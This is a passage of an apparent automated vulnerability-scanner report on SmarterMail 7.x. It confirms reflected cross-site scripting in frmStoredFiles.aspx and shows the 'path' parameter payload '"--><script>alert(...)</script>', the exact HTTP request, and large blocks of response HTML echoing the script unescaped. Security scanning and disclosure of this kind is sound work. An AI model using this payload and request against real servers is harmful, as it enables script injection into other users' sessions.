</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmStoredFiles.aspx?path='%22--%3e%3cscript%3enetsparker(0x0014AA)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFKiciLS0+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAxNEFBKTwvc2NyaXB0Ph4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZAIIDxYCHwRoZBgBBRNjdGwwMCRNUEgkRmlsZXNHcmlkDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZPmcEjhL3qcwr0qjNikvuto981Cg" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$BPH$ButtonUpdatePanel','tctl00$UpdatePanel1','tctl00$MPH$GridUpdatePanel','tctl00$Scripts$UploaderPanel'], ['ctl00$BPH$DeleteButton','ctl00$MPH$UpdateGridButton'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
'"--><script>netsparker(0x0014AA)</script>
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<span id="ctl00_BPH_ButtonUpdatePanel">
<div id="ctl00_BPH_PublishButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_PublishButton(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteButton(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_UploadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="return false;; return false;"><span class="BBInner">Upload</span></a></div>
</span>
<div class="TogglableButtons">
<div id="ctl00_BPH_DownloadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CheckForRows();; return false;"><span class="BBInner">Download</span></a></div>
</div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>



<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<input type="hidden" name="ctl00$MPH$uploadValidationToken" id="ctl00_MPH_uploadValidationToken" value="fcb7a187220340cd82a1169383a7373f" />
<input type="hidden" name="ctl00$MPH$pathField" id="ctl00_MPH_pathField" value="'&quot;-->&lt;script>netsparker(0x0014AA)&lt;/script>" />
<input type="hidden" name="ctl00$MPH$userField" id="ctl00_MPH_userField" value="dummy" />
<input type="hidden" name="ctl00$MPH$domainField" id="ctl00_MPH_domainField" value="hoytllc.com" />
<div id="ctl00_MPH_GridUpdatePanel">

<span id="ctl00_MPH_GridMenu">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm2' style='z-index: 800'><a class='hmA' href='#'>Download</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>

<div class="HyperGridWrapper" id="ctl00_MPH_FilesGrid">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_FilesGrid_Table"><tr><td class="NoItems" colspan="4">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_FilesGrid_HiddenInput" id="ctl00_MPH_FilesGrid_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_FilesGrid_HiddenLSR" id="ctl00_MPH_FilesGrid_HiddenLSR" value="" />
</div>
</div>

<a id="ctl00_MPH_UpdateGridButton" href="javascript:__doPostBack('ctl00$MPH$UpdateGridButton','')"></a>

</div>

</div>

<div id="ctl00_OMPH_AttachmentsAreaPanel">
<div class="AttachmentsArea" id="AttachmentsArea" style="display: none;">
<div class='plupload_scroll'>
<div class="plupload_content">
<div class="plupload_filelist_header">
<div class="plupload_file_name">
Filename</div>
<div class="plupload_file_action">
&nbsp;</div>
<div class="plupload_file_status">
<span>
Status</span></div>
<div class="plupload_file_size">
Size</div>
<div class="plupload_clearer">
&nbsp;</div>
</div>
<div class="plupload_filelist">
<ul id="uploader_filelist" class="plupload_filelist2">
</ul>
<ul class="plupload_filelist1">

</ul>
</div>
</div>
</div>
</div>
</div>

<div id="ctl00_Footer" class="Footer">
<div class="FooterNav">

</div>
<div class="FooterSummary">

</div>
</div>

<script type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
var searchId = 'ctl00_SearchRow';
if (parent.HelpPageID) parent.HelpPageID('main/frmstoredfiles', '');
$(function() {
if (parent.DoneLoading) parent.DoneLoading();
InitAjaxHandlers();
RegisterResizeEvent();
});
</script>



<script type="text/javascript">
function updateGrid() {
__doPostBack('ctl00$MPH$UpdateGridButton','');
}

function DoubleClick(url) {
SpawnHyperWindow(url, 427, 275, updateGrid);
}

function CheckForRows()
{
var grid = self.ctl00_MPH_FilesGrid;

if(grid == null || !grid.InitializeGrid || grid.GetSelectedRows().length == 0) { ShowAlertWindow('No item has been selected'); return; }

__doPostBack('ctl00$BPH$DownloadButton','')
}
</script>

<script type="text/javascript">
var uploadButtonClientID = "ctl00_BPH_UploadButton";

var uploader, uploaderTarget, uploaderId;
var WebPathVirtualAppPath = "/";
var Message_AttachmentTooLarge = "Your attachment exceeds the maximum allowed size.";
var Message_AttachmentZeroBytes = "One or more files are zero bytes and will not be uploaded.";
var Text_KB = "KB";
var Text_MB = "MB";
var Text_B = "B";
var GenericUploadError = "Error uploading one or more files. Please verify that the file does not exist and is not of a restricted type.";
var isBusy = false;
var ErrorText = "Error";
var activeUploadRuntime = '';

document.AdditionalResizeEvent = resizePage;

var resizePage = function() {
if(uploader && uploader.files.length > 0)
{
if ($('#AttachmentsArea').css('display') != 'none') {
scrollableSize = $('#Scrollable').outerHeight();
scrollableSize -= $('#AttachmentsArea').outerHeight();
$('#Scrollable').height(scrollableSize);
}
}
}

var initUploader = function() {
uploaderTarget = $(this);
uploaderId = uploaderTarget.attr('id');

if (!uploaderId) {
uploaderId = plupload.guid();
uploaderTarget.attr('id', uploaderId);
}

uploader = new plupload.Uploader({
runtimes: 'flash,html5,html4',
browse_button: uploadButtonClientID,
container: uploadButtonClientID,
chunk_size: '100kb',
max_file_size: 10485760,
filters: [{ title: "All Files", extensions: "*"}],
url: WebPathVirtualAppPath + "FileStorageUpload.ashx?uploadValidationToken=fcb7a187220340cd82a1169383a7373f&pathField='%22--%3e%3cscript%3enetsparker(0x0014AA)%3c%2fscript%3e&userField=dummy&domainField=hoytllc.com",
flash_swf_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf',
silverlight_xap_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.silverlight.1_2_1.xap'
});

uploader.bind("UploadFile", function(up, file) {
$('#' + file.id).addClass('plupload_uploading');
});

uploader.bind('FileUploaded', function(up, file) {
updateList(false);
});

uploader.bind('FilesAdded', function(up, files) {
var alertShown = false;
$.each(files, function(i, file) {
if (file.size > uploader.settings.max_file_size && !alertShown) {
ShowAlertWindow(Message_AttachmentTooLarge);
alertShown = true;
}
else if (file.size == 0 && !alertShown) {
ShowAlertWindow(Message_AttachmentZeroBytes);
alertShown = true;
}
});
});

uploader.bind("Error", function(up, err) {
var file = err.file, message;
if (file) {
message = err.message;
if (err.details) {
message += " (" + err.details + ")";
}
updateList(false);
}
});

uploader.bind('QueueChanged', function(up) {
if (uploader.files.length > 0)
ShowAttachentsArea(true, true);
if (updateList(true)) {
uploader.start();
}
});

uploader.bind('UploadProgress', function(up, file) {
isBusy = true;

updateList(false);
busyTimeout = window.setTimeout("isBusy = false;", 5000);
});

uploader.bind('StateChanged', function() {
updateList(false);
});

uploader.init();
};

function updateList(scrolldown) {
var retVal = false;
var fileList = $('ul.plupload_filelist2', uploaderTarget).html(''), inputCount = 0, inputHTML;
var fileListHtmlInProgress = "";
var fileListHtmlInQueue = "";
var fileListHtmlCompleted = "";

$.each(uploader.files, function(i, file) {
inputHTML = '';

if (file.status == plupload.DONE || file.status == plupload.FAILED) {
if (file.target_name) {
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_tmpname" value="' + plupload.xmlEncode(file.target_name) + '" />';
}
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_name" value="' + plupload.xmlEncode(file.name) + '" />';
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_status" value="' + (file.status == plupload.DONE ? 'done' : 'failed') + '" />';
inputCount++;
}
else if (file.status == plupload.STOPPED)
retVal = true;

var text = generateUploadListItem(file.id, file.name, file.percent, file.size, inputHTML, file.status);

if (file.status == plupload.QUEUED)
fileListHtmlInQueue += text;
else if (file.status == plupload.UPLOADING)
fileListHtmlInProgress += text;
else
fileListHtmlCompleted += text;
});

fileList.append(fileListHtmlInProgress);
fileList.append(fileListHtmlInQueue);
fileList.append(fileListHtmlCompleted);

fileList[0].scrollTop = 0;

if (uploader.total.uploaded + uploader.total.failed == uploader.files.length) {
uploader.stop();
updateGrid();

if (uploader.total.failed == 0)
ShowAttachentsArea(false, true);
else if(!top.confirmRadWindow)
ShowAlertWindow(GenericUploadError);
}

return retVal;
}

function generateUploadListItem(id, name, percent, size, extraHtml, status) {
var sizeString;

if (activeUploadRuntime == 'html4') {
sizeString = "Unknown";
}
else if (size > 10485760)
sizeString = Math.round(size / 1048576, 1) + " " + Text_MB;
else if (size > 1024)
sizeString = Math.round(size / 1024, 1) + " " + Text_KB;
else
sizeString = size + " " + Text_B;

var actionClass = "";

switch (status) {
case plupload.DONE: actionClass = 'plupload_done'; break;
case plupload.FAILED: actionClass = 'plupload_failed'; break;
case plupload.QUEUED: actionClass = 'plupload_queued'; break;
case plupload.UPLOADING: actionClass = 'plupload_uploading'; break;
default: actionClass = 'plupload_failed'; break;
}

if (percent > 0 && actionClass != 'plupload_failed' && actionClass != 'plupload_done')
..
- /Main/frmStoredFiles.aspx

/Main/frmStoredFiles.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx?path='%22--%3E%3Cscript%3Ealert(0x006503)%3C/script%3E

Parameters

Parameter Type Value
path GET '"--><script>alert(0x006503)</script>
__EVENTTARGET POST 3
__EVENTARGUMENT POST 3
__VIEWSTATE POST /wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo=

Request

POST /Main/frmStoredFiles.aspx?path='%22--%3E%3Cscript%3Enetsparker(0x006503)%3C/script%3E HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx?path=Root+Folder%5c
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Content-Length: 406
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=3&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo%3d

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 04:38:59 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6368
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
'"--><script>netsparker(0x006503)</script> - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmStoredFiles.aspx?path='%22--%3e%3cscript%3enetsparker(0x006503)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFKiciLS0+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA2NTAzKTwvc2NyaXB0Ph4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZAIIDxYCHwRoZBgBBRNjdGwwMCRNUEgkRmlsZXNHcmlkDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZOrUdUYKQfM6P4uJS4QqZzGe661a" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$BPH$ButtonUpdatePanel','tctl00$UpdatePanel1','tctl00$MPH$GridUpdatePanel','tctl00$Scripts$UploaderPanel'], ['ctl00$BPH$DeleteButton','ctl00$MPH$UpdateGridButton'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
'"--><script>netsparker(0x006503)</script>
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<span id="ctl00_BPH_ButtonUpdatePanel">
<div id="ctl00_BPH_PublishButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_PublishButton(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteButton(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_UploadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="return false;; return false;"><span class="BBInner">Upload</span></a></div>
</span>
<div class="TogglableButtons">
<div id="ctl00_BPH_DownloadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CheckForRows();; return false;"><span class="BBInner">Download</span></a></div>
</div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>



<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<input type="hidden" name="ctl00$MPH$uploadValidationToken" id="ctl00_MPH_uploadValidationToken" value="11576fa62afd486b954916b36afda96e" />
<input type="hidden" name="ctl00$MPH$pathField" id="ctl00_MPH_pathField" value="'&quot;-->&lt;script>netsparker(0x006503)&lt;/script>" />
<input type="hidden" name="ctl00$MPH$userField" id="ctl00_MPH_userField" value="dummy" />
<input type="hidden" name="ctl00$MPH$domainField" id="ctl00_MPH_domainField" value="hoytllc.com" />
<div id="ctl00_MPH_GridUpdatePanel">

<span id="ctl00_MPH_GridMenu">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm2' style='z-index: 800'><a class='hmA' href='#'>Download</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>

<div class="HyperGridWrapper" id="ctl00_MPH_FilesGrid">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_FilesGrid_Table"><tr><td class="NoItems" colspan="4">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_FilesGrid_HiddenInput" id="ctl00_MPH_FilesGrid_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_FilesGrid_HiddenLSR" id="ctl00_MPH_FilesGrid_HiddenLSR" value="" />
</div>
</div>

<a id="ctl00_MPH_UpdateGridButton" href="javascript:__doPostBack('ctl00$MPH$UpdateGridButton','')"></a>

</div>

</div>

<div id="ctl00_OMPH_AttachmentsAreaPanel">
<div class="AttachmentsArea" id="AttachmentsArea" style="display: none;">
<div class='plupload_scroll'>
<div class="plupload_content">
<div class="plupload_filelist_header">
<div class="plupload_file_name">
Filename</div>
<div class="plupload_file_action">
&nbsp;</div>
<div class="plupload_file_status">
<span>
Status</span></div>
<div class="plupload_file_size">
Size</div>
<div class="plupload_clearer">
&nbsp;</div>
</div>
<div class="plupload_filelist">
<ul id="uploader_filelist" class="plupload_filelist2">
</ul>
<ul class="plupload_filelist1">

</ul>
</div>
</div>
</div>
</div>
</div>

<div id="ctl00_Footer" class="Footer">
<div class="FooterNav">

</div>
<div class="FooterSummary">

</div>
</div>

<script type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
var searchId = 'ctl00_SearchRow';
if (parent.HelpPageID) parent.HelpPageID('main/frmstoredfiles', '');
$(function() {
if (parent.DoneLoading) parent.DoneLoading();
InitAjaxHandlers();
RegisterResizeEvent();
});
</script>



<script type="text/javascript">
function updateGrid() {
__doPostBack('ctl00$MPH$UpdateGridButton','');
}

function DoubleClick(url) {
SpawnHyperWindow(url, 427, 275, updateGrid);
}

function CheckForRows()
{
var grid = self.ctl00_MPH_FilesGrid;

if(grid == null || !grid.InitializeGrid || grid.GetSelectedRows().length == 0) { ShowAlertWindow('No item has been selected'); return; }

__doPostBack('ctl00$BPH$DownloadButton','')
}
</script>

<script type="text/javascript">
var uploadButtonClientID = "ctl00_BPH_UploadButton";

var uploader, uploaderTarget, uploaderId;
var WebPathVirtualAppPath = "/";
var Message_AttachmentTooLarge = "Your attachment exceeds the maximum allowed size.";
var Message_AttachmentZeroBytes = "One or more files are zero bytes and will not be uploaded.";
var Text_KB = "KB";
var Text_MB = "MB";
var Text_B = "B";
var GenericUploadError = "Error uploading one or more files. Please verify that the file does not exist and is not of a restricted type.";
var isBusy = false;
var ErrorText = "Error";
var activeUploadRuntime = '';

document.AdditionalResizeEvent = resizePage;

var resizePage = function() {
if(uploader && uploader.files.length > 0)
{
if ($('#AttachmentsArea').css('display') != 'none') {
scrollableSize = $('#Scrollable').outerHeight();
scrollableSize -= $('#AttachmentsArea').outerHeight();
$('#Scrollable').height(scrollableSize);
}
}
}

var initUploader = function() {
uploaderTarget = $(this);
uploaderId = uploaderTarget.attr('id');

if (!uploaderId) {
uploaderId = plupload.guid();
uploaderTarget.attr('id', uploaderId);
}

uploader = new plupload.Uploader({
runtimes: 'flash,html5,html4',
browse_button: uploadButtonClientID,
container: uploadButtonClientID,
chunk_size: '100kb',
max_file_size: 10485760,
filters: [{ title: "All Files", extensions: "*"}],
url: WebPathVirtualAppPath + "FileStorageUpload.ashx?uploadValidationToken=11576fa62afd486b954916b36afda96e&pathField='%22--%3e%3cscript%3enetsparker(0x006503)%3c%2fscript%3e&userField=dummy&domainField=hoytllc.com",
flash_swf_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf',
silverlight_xap_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.silverlight.1_2_1.xap'
});

uploader.bind("UploadFile", function(up, file) {
$('#' + file.id).addClass('plupload_uploading');
});

uploader.bind('FileUploaded', function(up, file) {
updateList(false);
});

uploader.bind('FilesAdded', function(up, files) {
var alertShown = false;
$.each(files, function(i, file) {
if (file.size > uploader.settings.max_file_size && !alertShown) {
ShowAlertWindow(Message_AttachmentTooLarge);
alertShown = true;
}
else if (file.size == 0 && !alertShown) {
ShowAlertWindow(Message_AttachmentZeroBytes);
alertShown = true;
}
});
});

uploader.bind("Error", function(up, err) {
var file = err.file, message;
if (file) {
message = err.message;
if (err.details) {
message += " (" + err.details + ")";
}
updateList(false);
}
});

uploader.bind('QueueChanged', function(up) {
if (uploader.files.length > 0)
ShowAttachentsArea(true, true);
if (updateList(true)) {
uploader.start();
}
});

uploader.bind('UploadProgress', function(up, file) {
isBusy = true;

updateList(false);
busyTimeout = window.setTimeout("isBusy = false;", 5000);
});

uploader.bind('StateChanged', function() {
updateList(false);
});

uploader.init();
};

function updateList(scrolldown) {
var retVal = false;
var fileList = $('ul.plupload_filelist2', uploaderTarget).html(''), inputCount = 0, inputHTML;
var fileListHtmlInProgress = "";
var fileListHtmlInQueue = "";
var fileListHtmlCompleted = "";

$.each(uploader.files, function(i, file) {
inputHTML = '';

if (file.status == plupload.DONE || file.status == plupload.FAILED) {
if (file.target_name) {
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_tmpname" value="' + plupload.xmlEncode(file.target_name) + '" />';
}
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_name" value="' + plupload.xmlEncode(file.name) + '" />';
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_status" value="' + (file.status == plupload.DONE ? 'done' : 'failed') + '" />';
inputCount++;
}
else if (file.status == plupload.STOPPED)
retVal = true;

var text = generateUploadListItem(file.id, file.name, file.percent, file.size, inputHTML, file.status);

if (file.status == plupload.QUEUED)
fileListHtmlInQueue += text;
else if (file.status == plupload.UPLOADING)
fileListHtmlInProgress += text;
else
fileListHtmlCompleted += text;
});

fileList.append(fileListHtmlInProgress);
fileList.append(fileListHtmlInQueue);
fileList.append(fileListHtmlCompleted);

fileList[0].scrollTop = 0;

